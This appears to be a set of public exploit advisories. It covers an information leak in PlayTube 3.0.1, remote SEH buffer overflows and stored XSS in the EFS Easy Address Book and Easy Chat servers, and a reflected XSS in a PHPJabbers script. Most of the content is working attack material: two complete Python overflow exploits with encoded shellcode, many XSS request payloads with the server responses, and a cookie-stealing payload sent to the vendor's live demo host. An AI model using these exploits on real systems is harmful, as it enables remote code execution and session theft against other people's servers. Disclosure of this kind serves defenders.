<pre><code># Exploit Title: PlayTube 3.0.1 - Redirect Information Disclosure<br /># Exploit Author: CraCkEr<br /># Date: 19/08/2023<br /># Vendor: PlayTube<br /># Vendor Homepage: https://playtubescript.com/<br /># Software Link: https://demo.playtubescript.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Sensitive Information Leakage<br /># CVE: CVE-2023-4714<br /># CWE: CWE-200 - CWE-284 - CWE-266<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />Information disclosure issue in the redirect responses, When accessing any page on the website,<br />Sensitive data, such as app IDs, is being exposed in the body of these redirects.<br /><br /><br />## Steps to Reproduce:<br /><br />When you visit most of pages on the website, such as the index page for example:<br /><br />https://website/<br /><br />in the body page response there's information leakage for "RazorPay Payment" id KEY<br /><br />+--------------------------------------+<br />razorpay_options = {<br /> key: "rzp_test_ruz***********"<br />+--------------------------------------+<br /><br /><br />Note: The same information leaked, for the app ID KEY, was added to the "Payment Configuration" in the Administration Panel<br /><br />Settings of "Payment Configuration" in the Administration Panel, on this Path:<br /><br />https://website/admin-cp/payment-settings<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Easy Address Book Web Server v1.6 - Multiple<br />Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-01-10<br /># CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493<br /># Vendor Homepage: http://www.efssoft.com/web-address-book-server.html<br /># Software Link : http://www.efssoft.com/eabws.exe (md5sum:<br />69f77623bb32589fb5343f598b61bbd9)<br /># Tested Version: 1.6<br /># Tested on: Windows 7, 10<br /><br /># CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br /><br />Vulnerability description: There is a remote stack-based buffer overflow<br />(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.<br />By sending an overly long username string to /searchbook.ghp for asking the<br />name via POST, an attacker may be able to execute arbitrary code.<br /><br />Proof of concept:<br /><br />import socket<br />import struct<br /><br />def sendbuff():<br /> # > arwin.exe kernel32.dll WinExec<br /> # WinExec is located at 0x776f2c91 in kernel32.dll<br /> shellcode_WinExec = (<br />"\x33\xc0" # XOR EAX,EAX<br />"\x50" # PUSH EAX => padding for lpCmdLine<br />"\x68\x2E\x65\x78\x65" # PUSH ".exe"<br />"\x68\x63\x61\x6C\x63" # PUSH "calc"<br />"\x8B\xC4" # MOV EAX,ESP<br />"\x6A\x01" # PUSH 1<br />"\x50" # PUSH EAX<br />"\xBB\x91\x2c\x6f\x77" # MOV EBX,kernel32.WinExec<br />"\xFF\xD3") # CALL EBX<br /><br /> shellcode_system = (<br /> "\x31\xC9" # xor ecx,ecx<br /> "\x51" # push ecx<br /> "\x68\x63\x61\x6C\x63" # push 0x636c6163<br /> "\x54" # push dword ptr esp<br /> "\xB8\x6f\xb1\xdc\x75" # mov eax,msvcrt.system<br /> "\xFF\xD0") # call eax<br /><br /> shellcode = shellcode_WinExec<br /> # SEH<br /> junk1 = "A"*455<br /> buffer = junk1<br /> buffer += "\xeb\x10\x90\x90" # jmp 0x10 to nops to shellcode<br /> buffer += struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071e<br />SSLEAY32.DLL from !Mona 0x1001071e<br /> buffer += "\x90" * 20<br /> buffer += shellcode<br /> junk2 = "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)<br /> buffer += junk2<br /> return buffer<br /><br /><br />def REQ_POST (padding):<br /> POST = (<br /> "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"<br /> "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0\r\n"<br /> "Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"<br /> "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"<br /> "Content-Type: application/x-www-form-urlencoded\r\n"<br /> "Content-Length: " + str(108 + len(padding))+ "\r\n"<br /> "Connection: keep-alive\r\n"<br /> "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"<br /> "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"<br /> "Upgrade-Insecure-Requests: 1\r\n"<br /> "Host: "+str(ip)+"\r\n\r\n"<br /> "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding<br />+<br />"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"<br /> )<br /> return POST<br /><br />ip = '192.168.X.X'<br />port = 80<br />payload = sendbuff()<br /><br />try:<br /> print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book<br />Web Server V1.6, length " + str(len(payload))<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.connect((ip, port))<br /> s.send(REQ_POST(payload))<br /> s.recv(1024)<br /> s.close()<br /> print "\n[*] Sended POST length " + str(len(payload))<br />except:<br /> print "Connecting error"<br /><br /><br /><br /># CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Address Book Web Server v1.6, does not<br />sufficiently encode user-controlled inputs, resulting in a stored<br />Cross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POST<br />method), in multiple parameters.<br /><br />Proof of concept:<br /><br />POST http://localhost/addrbook.ghp?id=1 HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 475<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/editcontact.ghp?id=1&cid=12<br />Cookie: SESSIONID=15337; UserID=; PassWD=<br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%<br />40demo1.com<br />&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=Save<br /><br />Vulnerable parameters: firstname, homephone, lastname, middlename,<br />workaddress, workcity, workcountry, workphone, workstate, workzip<br /><br />Response:<br /><br /> <TR><br /> <TD class=row2><SPAN class=genmed><A target=_blank<br />class=genmed href="viewcontact.ghp?id=1&cid=12">demo1<br /></a><script>alert(1);</script><a> demo1</A></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed><a href="mailto:<br />demo1@demo1.com">demo1@demo1.com</a></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed>demo1, , , ,<br />USA</SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed><a<br />href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD><br /> <TD class=row2 align=left><SPAN class=genmed><a<br />href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1<br /></a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD><br /><br /><br /><br /># CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2<br /><br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Address Book Web Server v1.6, does not<br />sufficiently encode user-controlled inputs, resulting in a stored<br />Cross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POST<br />method, authenticated Admin user), in multiple parameters.<br /><br />Proof of concept:<br /><br />Example 1:<br /><br />POST http://localhost/users_admin.ghp HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 134<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/users_admin.ghp<br />Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted><br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update<br /><br />Vulnerable parameter: email<br /><br />Response:<br /><br /><form method="POST" action=""><br /><TR><br /><input type="hidden" name="userid" value="2"><br /><TD class=row2 align=left><input type="text" name="username" size="15"<br />value="test"> </TD><br /><TD class=row2 align=left><input type="text" name="password" size="15"<br />value=""> </TD><br /><TD class=row2 align=left><input type="text" name="email" size="35"<br />value=""><script>alert(1);</script>"> </TD><br /><TD class=row2 align=left><select name="level"><option<br />>guest</option><option selected>user</option><option >power<br />user</option></select></TD><br /><TD class=row2 align=left><select name="state"><option<br />selected>Enable</option><option >Disable</option></select></TD><br /><TD class=row2 align=left><input type="submit" value="Update"<br />name="update_user"></TD><br /><TD class=row2><SPAN class=genmed><A class=genmed<br />href="user_delete_admin.ghp?2">Delete</A></SPAN></TD><br /></TR><br /></form><br /><br />Example 2:<br /><br />POST http://localhost/users_admin.ghp HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 144<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/users_admin.ghp<br />Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted><br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%<br />40fsdfs.com&level=user&state=Enable&update_user=Update<br /><br />Vulnerable parameter: username<br /><br />Response:<br /><br /><form method="POST" action=""><br /><TR><br /><input type="hidden" name="userid" value="2"><br /><TD class=row2 align=left><input type="text" name="username" size="15"<br />value=""><script>alert(1);</script>"> </TD><br /><TD class=row2 align=left><input type="text" name="password" size="15"<br />value=""> </TD><br /><TD class=row2 align=left><input type="text" name="email" size="35" value="<br />tt@fsdfs.com"> </TD><br /><TD class=row2 align=left><select name="level"><option<br />>guest</option><option selected>user</option><option >power<br />user</option></select></TD><br /><TD class=row2 align=left><select name="state"><option<br />selected>Enable</option><option >Disable</option></select></TD><br /><TD class=row2 align=left><input type="submit" value="Update"<br />name="update_user"></TD><br /><TD class=row2><SPAN class=genmed><A class=genmed<br />href="user_delete_admin.ghp?2">Delete</A></SPAN></TD><br /></TR><br /></form><br /><br />-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /># Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-01-09<br /># CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497<br /># Vendor Homepage: http://www.echatserver.com/<br /># Software Link : http://echatserver.com/ecssetup.exe (md5sum:<br />c682138ebbea9af7948a3f142bbd054b)<br /># Tested Version: 3.1<br /># Tested on: Windows 7, 10<br /><br /># CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br /><br />Vulnerability description: There is a remote stack-based buffer overflow<br />(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.<br />By sending an overly long username string to register.ghp for asking the<br />username via GET, an attacker may be able to execute arbitrary code.<br /><br />Proof of concept:<br /><br />import socket<br /><br />def sendbuff():<br /> # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/<br /> # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin<br /> # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)<br /> shellcode = (<br /> "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +<br /> "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +<br /> "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +<br /> "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +<br /> "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +<br /> "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +<br /> "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +<br /> "\x1c\x39\xbd"<br /> )<br /><br /> # SEH<br /> junk1 = "A"*473<br /> buffer = junk1<br /> buffer += "\xeb\x06\x90\x90" # short jmp to shellcode<br /> buffer += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E<br />SSLEAY32.DLL from !Mona<br /> buffer += shellcode<br /> junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4)<br /> buffer += junk2<br /><br /> return buffer<br /><br /><br />def REQ_GET (padding):<br /> GET = (<br /> "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"<br /> "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,<br />like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"<br /> "Host: "+str(ip)+":80\r\n"<br /> "Accept-Language: es-es\r\n"<br /> "Accept-Encoding: gzip, deflate\r\n"<br /> "Referer: http://"+str(ip)+"\r\n"<br /> "Connection: Keep-Alive\r\n\r\n"<br /> )<br /> return GET<br /><br />ip = '192.168.X.X' # change the ip address<br />port = 80<br />payload = sendbuff()<br /><br />try:<br /> print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server<br />3.1, length " + str(len(payload))<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.connect((ip, port))<br /> s.send(REQ_GET(payload))<br /> s.recv(1024)<br /> s.close()<br /> print "\n[*] Sended GET length " + str(len(payload))<br />except:<br /> print "Connection error"<br /><br /><br /><br /># CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Chat Server v3.1, does not sufficiently<br />encode user-controlled inputs, resulting in a stored Cross-Site Scripting<br />(XSS) vulnerability via the /registresult.htm (POST method), in Resume<br />parameter. The XSS is loaded from /register.ghp.<br /><br />Proof of concept:<br /><br />POST http://localhost/registresult.htm HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 257<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/register.ghp?username=<br /><redacted>&password=<redacted><br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%<br />25252540demo1.com<br />&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change<br /><br />Response<br /><BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been<br />changed successfully.</center></body><br /><br /><br />Go to:<br />http://localhost/register.ghp?username=<redacted>&password=<redacted><br /><br />Response - xss:<br /><TR><TD><br />Your profile/interests:<BR><br /><TEXTAREA rows="4" cols="30"<br />name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA><br /><INPUT type="hidden" name="cw" value="0"><br /><INPUT type="hidden" name="RoomID" value="<!--$RoomID-->"><br /><INPUT type="hidden" name="RepUserName" value="<!--$UserName-->"><br /></TD></TR><br /><br /># CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2<br /><br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Chat Server v3.1, does not sufficiently<br />encode user-controlled inputs, resulting in a stored Cross-Site Scripting<br />(XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter.<br /><br /><br />Proof of concept:<br /><br />POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4<br />HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 248<br />Origin: http://localhost<br />Connection: keep-alive<br />Referer: http://localhost/chatsubmit.ghp?username=<br /><redacted>&password=<redacted>&room=4<br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=<br /><br /><br />Response:<br /><html><br /><head><br /></head><br /><body><br /><script language="JavaScript"><br /><!--<br />parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font<br />color=green size=2>08:22:16 <a target=chatsubmit<br />href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> =><br /><a target=chatsubmit<br />href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a><br /></font><font color=#000000 size=2>demo </font> <img src=/face/100.gif<br />border=0>";<br />// --><br /></script><br /></body><br /></html><br /><br /><br /># CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Easy Chat Server v3.1, does not sufficiently<br />encode user-controlled inputs, resulting in a stored Cross-Site Scripting<br />(XSS) vulnerability via the /registresult.htm (POST method), in Icon<br />parameter. The XSS is loaded from /users.ghp.<br /><br />Proof of concept:<br /><br />POST /registresult.htm HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 235<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/register.ghp?username=<br /><redacted>&password=<redacted><br />Upgrade-Insecure-Requests: 1<br /><br />UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change<br /><br />Response:<br /><BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been<br />changed successfully.</center></body><br /><br />When user information page load:<br /><br />http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4<br /><br />&nbsp;<font color="red">[vip room]</font><br /><br><br><br />[Online users:1]<br><br>[<a<br />href="javascript:parent.chatsubmit.getname('All');"<br />target="chatsubmit">All</a>]<br /><br><br><br /><script><br />if(navigator.appName!="Netscape" && parent.chatsubmit.document &&<br />parent.chatsubmit.document.readyState == "complete")<br />parent.chatsubmit.listcolorchange();<br /></script><br /><img src="/images/""><script>alert(111)</script><i>[<a<br />href="javascript:parent.chatsubmit.getname('<redacted>');"<br />target="chatsubmit"><redacted></a>]<==<br><br /><br><br /><br><br><br />[<a href="javascript:OnRegister();">Change infomation</a>]<br /></i><br /><br /></code></pre>
<pre><code>## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 08/31/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/php-review-script/<br />## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected<br /><br />## Description:<br />The value of the `action` request parameter is copied into the HTML<br />document as plain text between tags. The payload aelll<img src=a<br />onerror=alert(1)>nx0ib was submitted in the action parameter. This<br />input was echoed unmodified in the application's response. The<br />attacker can steal a PHPSESSID cookie!<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />```GET<br />GET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ib<br />HTTP/1.1<br />Host: demo.phpjabbers.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: _ga=GA1.2.221094441.1693486538;<br />_gid=GA1.2.1044601458.1693486538; _gat=1;<br />_fbp=fb.1.1693486538348.177361623;<br />_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0<br />Upgrade-Insecure-Requests: 1<br />Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)<br /><br />## Time spend:<br />01:05:00<br /><br /><br /></code></pre>